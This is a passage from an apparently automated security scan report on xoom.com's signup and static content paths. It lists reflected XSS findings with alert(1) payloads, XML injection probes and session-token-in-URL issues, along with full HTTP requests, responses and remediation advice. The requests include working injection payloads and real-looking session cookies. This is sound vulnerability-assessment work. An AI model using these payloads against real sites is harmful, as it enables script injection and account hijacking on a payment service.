JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=FA98DF9F18007412EFC1F0D627F7DD52; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:35 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "09efd75bebd879bd2eb46537722faf939" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:27 GMT Content-Length: 29982 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.value=&signInTs=1320876654393f5748"><script>alert(1)</script>8c0f4bfaa9682ceb7 &contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.21. https://www.xoom.com/sendmoneynow/signUp [token parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the token request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac34'%3balert(1)//be47d01954c was submitted in the token parameter. This input was echoed as cac34';alert(1)//be47d01954c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
POST /sendmoneynow/signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B Content-Type: application/x-www-form-urlencoded Content-Length: 345 first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cbcac34'%3balert(1)//be47d01954c &_action=signUp
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=90E9D6380334C9F3FA77BFB18F5BB61A; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:36 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:36 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "00a3e2dd940d5039803dcac2eaf5d9b77" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:28 GMT Content-Length: 30696 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... jQuery('#sign_in_ts').val(new Date().getTime()); return __submit_form_by_id('signUpForm', 'signUp',{'token': '2f5c1a54e134df4686142187005bbf233797a34f661246cbcac34';alert(1)//be47d01954c '} ); }); }); </script>...[SNIP]...
1.22. https://www.xoom.com/sendmoneynow/signUp [token parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a53"><script>alert(1)</script>f12273ea59423a079 was submitted in the token parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb33a53"><script>alert(1)</script>f12273ea59423a079 &_action=signUp HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=7DFEB68FDC1706A5293EE8A0E70493B0; Path=/sendmoneynow Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:36 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.filter.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow Set-Cookie: feeCalculatorSendAmount=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: timeZone=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: UnicaID=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: com.xoom.ocb.web.cookie.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xab=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xco=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: xlang=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:36 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store ETag: "0c07c14f36d8eb6864ddf72027bdf0a46" Content-Type: text/html;charset=UTF-8 Content-Language: en Date: Wed, 09 Nov 2011 22:11:28 GMT Content-Length: 29970 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Register G...[SNIP]... ignUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb33a53"><script>alert(1)</script>f12273ea59423a079 &name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
2. XML injection
previous
next
There are 3 instances of this issue:
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data. This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
2.1. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 2]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4]]>> /img/ocb/favicon.ico HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=1209600,public Content-Type: text/html Content-Length: 345 Date: Wed, 09 Nov 2011 22:11:21 GMT Server: lighttpd/1.4.23 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w...[SNIP]...
2.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 3]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4/img]]>> /ocb/favicon.ico HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=1209600,public Content-Type: text/html Content-Length: 345 Date: Wed, 09 Nov 2011 22:11:22 GMT Server: lighttpd/1.4.23 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w...[SNIP]...
2.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 4]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4/img/ocb]]>> /favicon.ico HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Found Cache-Control: max-age=1209600,public Content-Type: text/html Content-Length: 345 Date: Wed, 09 Nov 2011 22:11:22 GMT Server: lighttpd/1.4.23 <?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w...[SNIP]...
3. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
3.1. https://www.xoom.com/sendmoneynow/fp/check.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/check.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:01 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:01 GMT; Path=/ Location: https://h.online-metrix.net/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 Content-Type: text/javascript Content-Length: 0 Date: Wed, 09 Nov 2011 22:10:54 GMT
3.2. https://www.xoom.com/sendmoneynow/fp/clear.png
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/clear.png
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2
Request
GET /sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 &m=2 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:01 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:01 GMT; Path=/ Location: https://h.online-metrix.net/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2 Content-Type: image/png Content-Length: 0 Date: Wed, 09 Nov 2011 22:10:54 GMT
3.3. https://www.xoom.com/sendmoneynow/fp/fp.swf
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/fp.swf
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently Server: Apache-Coyote/1.1 Set-Cookie: loc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:02 GMT; Path=/ Set-Cookie: recLoc_1=en; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:25:02 GMT; Path=/ Location: https://h.online-metrix.net/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 Content-Type: application/x-shockwave-flash Content-Length: 0 Date: Wed, 09 Nov 2011 22:10:55 GMT
3.4. https://www.xoom.com/sendmoneynow/signUp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The response contains the following links that appear to contain session tokens:https://www.xoom.com/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 https://www.xoom.com/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2 https://www.xoom.com/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1 Host: www.xoom.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://www.xoom.com/sendmoneynow/home Cookie: JSESSIONID=85C71DA14E0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
